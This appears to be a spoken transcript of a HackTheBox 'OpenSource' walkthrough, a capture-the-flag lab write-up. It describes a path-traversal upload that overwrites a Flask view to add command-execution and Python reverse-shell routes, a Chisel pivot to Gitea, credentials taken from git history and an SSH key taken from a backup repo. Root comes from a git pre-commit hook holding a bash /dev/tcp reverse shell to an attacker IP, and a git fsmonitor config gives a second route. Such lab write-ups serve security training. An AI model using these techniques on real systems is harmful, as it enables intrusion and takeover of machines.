What's going on YouTube? This is Ipsag. We doing open source from HackTheBox, and I really enjoyed this machine because it starts out with just a simple Python file upload application, and the author gives you the source code, so you can do some source code analysis to find the vulnerability, but the vulnerability itself is common enough. Most people know how to attack file upload, so you could have skipped the source code analysis, but if you do, you'll have trouble with the next step because the author provided you the source code with the .git file, so you could go through other branches and commits and find a hard-coded credential which is used to log into the Gitea interface that you need to pivot through the web server to access. And Gitea is just like a Git repository or whatever to share code. Looking through that, you find a SSH key in Gitea to log into the box. And then the prefix is the author coded something to automatically update his repository with Gitea, but you can modify his gitconfig to get code execution, either modifying the config file itself, which allows code execution on pretty much any command, so like a git status command. But the cron is doing a like a push, so you can put a pre-commit hook in and get code execution that way. But enough talking, let's just jump into the box. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it open source, and then the IP address of 10.10.11.164. This can take some time to run, so I've already ran it. Looking at the results, it looks like 3 ports are open because it scans 1,000 ports by default, and we're at 997. So the first port is SSH on port 22, and its banner is telling us it's an Ubuntu box, specifically this version, which, because I've done this 100 times, I know this is Ubuntu Bionic, which is, I think, version 18. The second thing we have is HTTP on port 80, and it's running Werkzeug and Python version 3.10, which is odd, but we'll get to that in a second. Finally, the last port is 3000, and it's just telling us it's filtered, so there's nothing there. It just means there's a firewall or something because this port is behaving differently than all the other ports. Generally, when people put an IP tables rule in, they say drop the packet instead of reject the packet. And what drop does means it drops the packet. It doesn't take any actions after that. If you do reject, then the box itself will tell you the port is not listening. It sends a reset connection back. So I'm guessing every other port responded with a reset. This one didn't respond at all, so Nmap's telling us it's filtered. But more about this. So this is Ubuntu Bionic, and I know Ubuntu Bionic ships with like Python 3.6, but this is Python 3.10, and that is weird, right? We can confirm this by if we go just Google, what is it, for Ubuntu 0.7. So I'm going to Google this, and I'm going to go to the packages ubuntu.com, and we see 7.6p1, 7.6p1 for Ubuntu 0.7. And this is part of Bionic. It's telling us right here. And if we look at Bionic's Python version, so let's see, if we go to Bionic updates, let's just search Python packages. So I'm going to just search package name for Python 3.10, right? And we can see it's in Ubuntu Impish, Jammy, and Kinetic. We don't see Bionic here. If we do Python 3.6, we see Bionic is listed because that's the version of Python that runs with Ubuntu Bionic by default. 3.8 could also be Bionic. We see that listed here. But since it's not listed, I'm going to guess there's some type of Docker running, just because generally when this happens, it's going to be Docker on HackTheBox, but it could just mean it's a different box altogether and you have some network address translation going on. Just a fancy way of saying port 22 and port 80 are not going to the same operating system. But enough of that recon talk. Let's look at the actual website. So if I go to 10.10.11.164, we get a website that says UpCloud. And looks like these links go nowhere. Let's see. Looks like we can download the source code. So I'm going to do that. And then we can do take me there. We go to a file upload form. Let's see, what else do we have? If we click on this menu thing, Twitter, Facebook, email, everything else is going nowhere. So let's take a look at the download. So that was what was the file name? Source.zip. So I'm going to move downloads source.zip to my directory. And I know we could try starting off by uploading files, but I'm more interested in looking at source code right now. Whenever I get a chance to like black box test something or just look at the source code, I always go for the source code. So I'm going to make a directory just in case this clobbers my directory when I unzip it. So I'm going to do unzip source.zip, and we can see it put files in my current working directory. So that's why whenever I unzip things, I always create a directory first, so I can see that. And right off the bat, we see build docker.sh, confirming that it is running Docker. It's not telling us what image it's pulling. I'm going to guess this is Alpine, but maybe the Docker file will. Python 3 Alpine. So that is the Docker image that it's pulling from. But let's go and examine this code. So I'm going to open up Codium, and we can file, open folder, and then let's see, HTTP. This is open source and web source. I'm just going to open this app. I think app is the directory I want. Is there anything in config that's a Python file? Nope, that's Docker config. So let's open this. And if I look at run.py, it's just going to listen on port 80. Public, this is where uploads is going to go, so public uploads. And if this was a PHP app, I would be testing like /public uploads, make sure this directory exists. It does not. Maybe just /uploads. It does not. Okay. I thought it would, but maybe not. If we go to views, we can see there is uploads and just /. Looking at util, configuration, there's not that much information here. We have a .vs code directory, but nothing in it. If I look at a git log, we can see there's different commits. So I'm going to do a git show on the latest commit to see what was changed. If I did it on this bottom commit, then it would just be a mess because that's adding everything, right? So looks like they set the environment mode to production and took debug mode off. Now, if we do a git branch command, we can see there's multiple branches of this. So I'm going to do a git checkout dev to switch over to the dev branch. If I do a git log here, we see a lot more files here. And additionally, if I go back to here, my views has changed. We do have a download functionality, and I guess this is how source.zip is downloading. I'm not sure if that was there before. And then we have a upcloud. This is how it uploads. And off the bat, I'm noticing there is a vulnerability. This os.path.join. Let's play with this real quick to show you. So Python 3, import os. And if we do os.path.join, and then app ipsec, it's going to generate this path for us, right? If we do .. it puts that there. But that's not really that interesting, because if we prefix something with a /, it erases everything before it, because it's normalizing a path. And when a path begins with /, it just goes back to the beginning, right? So how can we abuse this? Well, this file upload is trying to trap us in this public uploads directory. But because we control the file name, at least I believe we do, f is equal to request.filesFile, and get file name right here. If we look at this, what function is this? App utils, get file name. So, get file name is actually blocking .. and I'm guessing, I guess this is replacing it with nothing. So we can't do this .. but we can begin it with a / because it's not replacing begins with /. It's only replacing .. to prevent that type of directory traversal. But since we can now overwrite this, we can write anywhere on the file system. So if this was running as root, we could probably overwrite a cron. If we knew what user we were, or if it's root, we can probably just write the etc cron tab and get code execution that way. I don't know what user we're running as. Let's test that. I did not actually do that when playing with this box before I recorded the video. So let's see. Let's test this out. So if we create a malicious file, so I'm just going to go in open source, and what should we do? I'm just going to make it ping. So we'll just do ping 10.10.14.8 and wget 10.10.14.8, port 8000. And I'm doing a wget as well because what if ping doesn't exist on the system, which is somewhat common actually for Docker. So I'm just trying multiple things. This one can be a tcp dump-i ton0 icmp. Okay. And let us try to upload a file. So take me there. Let's switch over to Burp Suite and then upload our file. So let's switch to the directory HTTP, open source. That's not what I wanted to do. HTTP, open source. That's open keys, source. And then test.sh, upload, go over to burp, and we're going to change the file name to /etc cron tab. And I just realized we probably want to put the actual cron entry in. I think it's 5 stars. Let's see. Cat etc cron tab 1, 2, 3, 4, 5, the username, and then the command. So root, like that. And then which ping, user bin, which wget, user bin. Okay, and let's actually send this to repeater so we can see what it says. We see our file has been uploaded. So if I look at the date, maybe in a minute or 40 seconds, we'll see some code execution. So I'm going to pause the video and we'll just see what happens. So it's been over a minute and we still don't have any hits. So I'm guessing this path does not work. Now in Python, if you run things in debug mode, which we did see in the git config that there is an environment set, so maybe this web server is running in debug mode. When you update a file, it auto reloads the Python file. So if we edit our actual config, then we may be able just to add functionality. So maybe just add a code execution endpoint, right? So what I want to do first is figure out exactly where in the code we are. So I'm going to try, let's hitting /uploads and not giving it a path. So I'm going to do, let's see, go back here. We can turn Burp Suite off. If I just hit /uploads, not found, and we give it a fake file, we get an error and an error message. And this is certainly what we wanted. Because we can see this file is running in app.views.py. And this is workzug, and if this was an old version of workzug, we'd be able to click this like open interactive shell and then type a pin code in. Well, it wouldn't ask for a pin code. The pin code is in, I guess, version of workzug like after 2016. This is a super old vulnerability. But in super old versions of this, you could just click that and it would open a Python interpreter. But in this one, we can't do that. It does leak, however, the file name, so app.views.py. So let's go and create a new route. So what I'm going to do is copy this uploads route, and we're going to do app route, and let's see, I'm going to add a CMD route, and we can call this run command, and then pipe cmd. So what this is doing is just saying what's after uploads gets assigned to cmd, and we're passing that into this. So here we can import subprocess, and we probably should do the import at the top of the program, but it really doesn't matter. So we can do subprocess.check output, and then we want to do cmd.split like this, I believe. And the reason why we're doing cmd.split is because this subprocess.check output is expecting a array. If we do it over in a new terminal, Python 3, import subprocess.check output. Is it underscore? Yeah. If I just give it ID, oh, looks like it works. Yeah, like that, it also works. So I wonder if I do echo test. No such file. But if I put this in a dictionary, so echo comma test, then it works. So that's why I'm doing this, because subprocess.check output, it's expecting the binary to be the very first parameter, and then everything else after it is arguments. If you didn't put it as a array or list, whatever you want to call it, then it's going to think echo test is the name of the binary, and it doesn't work. So that's why I do that split. So if we have echo test like this, and we call .split, it's going to put that in the array for us. So that's why I did that. And we can save this. Actually, we should do run. And now if I upload this, so let's go back here, upload file, web source, app, views. Make sure we are going to intercept this request. And then upload. Because we have to change this to, oh shoot, was it apps? Let's see, where is the file? App views. Like that. I'm just gonna put that in a repeater. Save it. File has been uploaded. So now if I kill burp suite and we do /run ID, we have our command. If I do echo test, do I have a space? I do. The downside to this is because I'm using the subprocess check output, it's not going to be command injectable, which means like special characters like pipe and stuff won't work. My first thing to do is like a which bash to see if bash exists. So which bash, return non-zero. Which sh? Sh exists. So bash does not exist on the system. The reason why I tried sh second is I wanted to see if like the command which did not exist on this box, but bash does not, which means we probably can't use our reverse shell. And I'm not going to do the netcat reverse shell because it's using a lot of special characters and it's just a pain, right? To demo this, let's see. Let's echo, please subscribe to base 64, right? And if I go here, we can do echo this, and we see that. If I do now a pipe base 64-d, it's not doing the pipe as we expect. It's just treating it safely and not executing. So this is why I'm not using that weird like MK FIFO for file in, file out netcat shell. It is Python though. So I'm just going to Google Python reverse shell, and we're going to give ourselves a shell. So payload all the things. Let's see, there should be a Python shell. Where is it? Socat Python. And I don't know what the difference between these three are. They look the same. Let's just try the first one first. Copy this whole thing. Then we can paste it, and we'll also give a new route, and we're going to call this rev shell, and we'll put IP as a parameter. Get rid of, whoops, these. And now we just got to clean up this code. So import socket os.pi, that's fine. Socket sconnect. This can just be IP. Come on. I should have done like a search and replace to fix this. It would probably work with out breaking out all those semicolons, but it's just not pretty. So now we're adding a rev shell endpoint on IP. We'll call this rev shell like that. And let's test this out. So I'm just going to copy and paste this. That should work. We only need to add this function. So copy, go back here, and hope this works. So send. File has been uploaded. So now if we hit rev shell 10.10.14.8, what port was this? I did not update that. That's 4242. I'm just going to put it for 9001 because I can. So let's do nc lvmp 9001. Hit this, and we get a shell. So the first thing I'm going to do is clean up my terminal. So python 3-c import pty.spawn bin bash like that. Oh, not bash, sh. Because bash does not exist on the system, right? So now I can do stty raw minus echo fg. There we go. And we're on the system. So if I do id, we are root. So if I can do etc cat cron tab, that's like that. I wonder if cron's not working on this, or maybe my cron tab needed like bin sh, like that. Is that how my cron tab looks on my system? No. But it does have shell and path. I wonder if that's what we needed. Like that. Which wget, user bin wget, so that should be working. So if I ever see a wget come across, I don't know if that was the error. If I don't see a wget come across, then I'm going to guess cron doesn't work inside this Docker container, which wouldn't be a huge surprise. It's actually bothering me. I'm just going to wait 5 seconds. I don't even have to pause the video. So now we should be doing a wget, and we don't. So I'm going to guess cron tab is not working on this Docker container, because if I copy this, it does actually work, and we can see it get hit. So, okay. Now that we're in this container, what can we do? The first thing, let's go, it's not var_dub, it's app, and see if we have any credentials anywhere, right? lsla, .vs code. There's probably nothing here. Nope. Let's see. Let's run.py. This is the same thing we had seen. App. There is a configuration. Don't really have anything here. There's no database, so there's not much we can get from this container. So the next thing we should look at is that port 3000, right? So if I do IP-ADDR, we can see my IP address is 172.17.02, which is a standard Docker. We knew we were in a Docker thing. We can cat docker env and know we're in there. But the host is going to be 0.1. And we can test this by nc 172.17.0.1 on port 22. We see this for Ubuntu 0.7, 7.6 P1, which we saw earlier in the video, so we know that works. We can also go to port 3000 and see what this is, or do like -ZV to connect, and we see it's open. I'm going to guess this is going to be a web server. So let's see, do we have a get? We can just do get/http 1.1. So get/ like this. It's missing the host header, but this is definitely a web server because something responded to us, right? So get/http 1.1 like that, and then host. It's host, right? Yep. 172.17.0.1 like that. And we get a page back. And if we wanted to, we could look at the headers, right? And see if this tells us anything. So 200 OK, cookie, nothing too interesting. We see this cookie, I like Gitea. So this is a Gitea page. So let us upload Chisel to the box so we can access this from our own environment, right? So I'm going to Google Chisel GitHub to just download this real quick. We'll set up a tunnel to access this. Download this, Linux, AMD 64. I think this will work on Alpine. Let's go to cd temp. Make dir dub, move downloads Chisel, then gunzip-d, move this to just a quicker, easier name to type, and python 3-m http server, already in use. Oh, I should not have started that web server not in like a dub directory because people could have downloaded some notes. Not a good habit to be in, not going in dub first and starting a web server, but I digress. Let's wget 10.10.14.8, port 8000, Chisel, and it is now downloading. So what we want to do is start a Chisel server. So chmod +x Chisel, server -- reverse. It wants to bind on port 8080. So I'm going to do -port 8001. So now we're listening on 8001. So we can do /chisel client. And the reason why we're client is clients are always going to be the one connecting to the server. If we stood up Chisel in a server mode on like port 8000 here, there's no guarantee we'll be able to reach it. Actually, I know we can't because we're in a Docker container and the 10.10.11 address won't automatically route inside this Docker container on other ports. So we have to be in client mode. And then we want to specify 10.10.14.8, port 8001, and we're going to say our socks. And that was a bit messy because we got like a standard in out thing as we're working. So that's what it looks like if you're trying to copy. So we see it connected and we see we open port 1080. So now if I go to Firefox, we can do proxy 1080 and I should be able to hit 172.17.0.1, which is the Docker IP, and we can. So if I try port 3000, we see Gitea. And it's also telling us the version. If we looked at this, I don't believe it's vulnerable to anything. Go to sign in and we need credentials. So if we pillage the Git thing we had downloaded more, we may find old credentials, right? And I'm saying that because the web source in this Git log has a lot of commits. So if we just git show each commit, so let's look at this one. Let's see what has changed. Adding routes, git log, git show, adding a git ignore. Oh, because they added a lot of directories there. And they actually removed something. So if we went to the very first commit, we'd probably see something in this like, I'm guessing this is VS Code. Yeah, VS Code settings.json. And they hard-coded the HTTP login. So in VS Code, you can configure it to automatically use Git so you don't do any of the commands. And when you do it through HTTP login, it's got to save the credentials somewhere. And here we see it saved, right? So if I log in with these credentials, dev01, soulless developer, we get logged in here. And we could also, for good measure, check SSH, right? So let's open a new tab, I guess. SSH dev01 at 10.10.11.164. And we just get permission denied right away because password login is disabled. So I bet if we did, let's see, -v, what's this tell us? Tries a bunch of private keys. There is a command to not try private keys, because if we tried this on like a Windows SSH server without specifying a option, it's automatically going to do this because Windows treats each of these as a login attempt. And I think after 3 login attempts, it just kills you, right? So if we were doing, if we wanted to force it to only do a password login, we can do the option of preferred authentication. Make sure I type that right. Preferred authentication. I'm going to camel case this. And that can equal password. And let's see. Did I typo that? Easily test with Google. We have to turn the proxy off. Come on. Authentications. Okay, and we still get denied. And that's just going to change the order so it does a password login first. But the server is just set up to only allow public key authentication. We can see authentication that can continue, public key. So let's go back to Gitea since we logged in. And there is a repository, this home backup. So I'm going to go here. It's going to direct me to opensource.htb. So let's just add this in our host file. So sudo vi etc host. And we will do 10.10.11. 10.10.11.164 is the IP. Put opensource.htb. Refresh this page. And hopefully it works. Oh, shoot. We can't do that one. We have to do the 172 address, 172.17.01. And we also have to turn our proxy back on. Refresh. 404 does not exist. I guess we're no longer logged in. Dev01. Let's see, where was that file? Right here. Soulless Developer 2022. It's important to note, if you're watching this video in a few months and this credential did not work, I would have tried 2023 or maybe 2021 and just try a bunch of different credentials, right? So let's try .ssh. This looks like it is the home directory, right? We can look at bash history as well to see if there's anything in here. Nothing. But SSH is interesting, and we have ID RSA, so we can go and download this key. So let's add this. So we're going to call this, whose key is this? If we go up one directory to IDRSA pub, it is dev01. So I'm going to call this dev01.key. Paste the key in, chmod 600. Now let's see if we can log in with it. So sh-i, dev01.key, and then dev01, which is the user, 10.10.11.164. It's thinking, and we get logged in. And this is an Ubuntu 18 box, just like we thought from our initial Nmap scan. So if we do a lsla, we can see the user.txt file is here. And we see also looks like May 4th is when this directory got created. October 6th, that is today. So it looks like .git is being modified constantly. 21:22. What time is it? It is that exact minute. So that right off the bat is odd that something keeps modifying .git. If we go into .ssh, we do have stuff on March 23rd. So it looks like the user got created May 4th, and then stuff happened with SSH on March 23rd. And generally the first thing I do when pen testing a box is not run linps right away, but search the file system for files between a certain time, and that's going to be probably March 23rd, because we know Devo1 was on this box then. He added his keys. What else did he do on March 23rd, right? So that's always something good to look at. We can do that with a find command. So if we do a find / with -newer mt for newer modified time, then 2022, the year, March, which is 03, the date. Let's do newer than March 22nd. And then I'm going to do a not with an exclamation point. I'm going to do newer mt yet again and say 2022, 03, 24. And then I'm going to do a -ls so it shows us all the permissions. And then we also want to hide error messages with to dev null. So now we have a list of a bunch of files of interest. I'm going to do a less-S, and that's going to pipe this to less, and the -s is going to not do line splitting like this. So it's just easier to read. And we have a bunch of stuff, right? I don't care about anything in Git. And if you do an ampersand, then exclamation point, this is going to like remove things from your find view, right? So I'm going to do ampersand exclamation point. We see not match. And I'm going to say .git. Let's actually escape the period, git, and put a slash. So now we just hid everything with .git. We see nothing else of interest in home, so I can just go down. We have this Etsy thing. I'm looking at it. Doesn't seem too interesting. Opt GitLab. Nothing really interesting there. Oddly enough, the opt GitLab changes like the whole tabbing. And it's because this one is created by GitLab PSQL. So that's why the whole, I guess, tab indentation changed. Now, this is going to be annoying because we have a lot of Python junk, right? So I'm going to do an ampersand. I think I am. There we go. And then exclamation point for not match. And I'm going to do $py $ to not match anything that ends in py. And now suddenly that is removed. So it makes it a bit easier to go through, right? We could also like ampersand exclamation point dist packages, hide that as well. Don't really see anything interesting in user lib, user share, no. User bin, nothing really interesting there. Oddly enough, there is a user local bin, Git-Sync, and this is really interesting to me because anything in user local, this is not created by a package manager. This means the administrator likely put this file here, right? So I'm going to look at this Git-Sync. It is owned by root. We can't modify it, only root can, but we should look at that file. Looking else, we have D package, varp GitLab. This is another GitLab thing, and nothing else. So this user local bin Git-Sync really sticks out. I'm going to cat it, and we can see it's just a bash script. And this is going to explain why that .git directory keeps getting updated, because there is a cron running constantly. If I do a lsla now, we can see it's 2129. I want to say that was 2122 last time we looked at it. So if I do a date again, 30, look at this, and we can see it gets updated. If we didn't see it updated like this, we could upload like pspy to the system and see it that way. We could also just do a watch command, right? So if I do watch-n for interval, let's do every half a second, and we'll do a ps-ef and grep for Git-Sync. I want to say it was Git-Sync. And we're going to wait for the new minute. So I'm going to pause the video, and we're just going to wait for this to get closer to the minute. Okay, we see 58, 59, new minute, and it is running this Git-Sync program. So now we have confirmed this is indeed going to be executing constantly. So let's take a look at this now that we know someone is running it to see if there is a vulnerability. So it's doing git status. I don't know what porcelain is. I have no idea what that command means. But if this exits with a, I guess, non-zero code, then it says no changes. So if I do echo like that, I think that does the last exit code, right? Echo test. I think it's $? Echo $? Yeah, that's the exit code. So if I do this git status porcelain, and we check this, it is 0. So I wonder if I touch a file, ipsec, let's do git status porcelain, that's telling me the new file, and I look at this exit code, and it's still 0. Huh. So I'm guessing there's a bug in the script because that if-then is always going to go down the same exact path, because here there's no new files, it still exited 0. Here there is a new file and it still exits 0. So let's cat that again real quick. So we know it's always going to be 0, so I think it's always going to detect changes. And this is probably explaining why the home directory is always getting updated every minute, because this command doesn't work, right? They should have got the output and said, hey, if this output is greater than or 1 line or more, then go down here. If this output is no lines, then echo no changes. Something like that. But that is definitely a mistake in this bash script. And it's always just going to do a git commit. So the easiest way to exploit this is just editing a hook. So if I go into this .git directory, we can go into hooks and see where we can hook things, right? There is a pre-commit hook. So pre-commit.sample. And we can see it's going to execute a command before that, right? So I'm just going to create pre-commit, and we'll do bin sh like it said. And then I'm just going to do bash, bin bash, and then bash-i dev tcp 10.10.14.8, 9001, 0, and 1 like that. We'll chmod plus x with pre-commit. And nclvnp 9001, look at the date. It's going to execute in a minute. I'm just going to put something in ipsec. So we'll echo please subscribe into ipsec. So that way if it detects changes, it will commit them, right? I'm not sure if it would have committed without this, because it may run like the git commit and something may happen before it that says, well, this has already been committed, so we're just going to exit. But this should work in 20 seconds. So date, sleep 20. I'm going to pause the video and we'll resume it close to this. And the sleep has finished and we get a shell. So like that, we are now root on this box. So I can go into /root and cat root.txt, right? There are other ways you can weaponize this whole Git directory. Generally, whenever you have control over a configuration directory, you can get code execution. So what I'm going to do is remove our pre-commit. And let's see. There is, git-config. It's either I think it's FSMonitor. FSMonitor code execution. Let's see. And here, I think this blog post talks about it. So they're adding this here. And what's cool about doing it this way is it would execute on the git status command. It wouldn't require, for us, it requires them doing a commit because we're on a pre-commit hook. But if we did it this way, it would just work on the status command, right? So let's see. Date, I'm actually going to, we can just do this quickly, right? So Let's do v config, and we can say FSMonitor is equal to ID, write to home dev01, please subscribe. And this probably goes in quotes. It does. Yeah, it does. I think. They're echoing it. Yeah, they have it in quotes. So we save this, and we do a git status, and do a lsla. We can see please subscribe is created by me, right? If I wait a minute, it'll be now created by root probably. We have to delete the file for it to be created by root, but if we remove it, lsla doesn't exist, git status, and now it does. So that's another way you could persist in git configs. There's probably more, but hope you guys enjoyed that video. Take care, and I will see you all next time.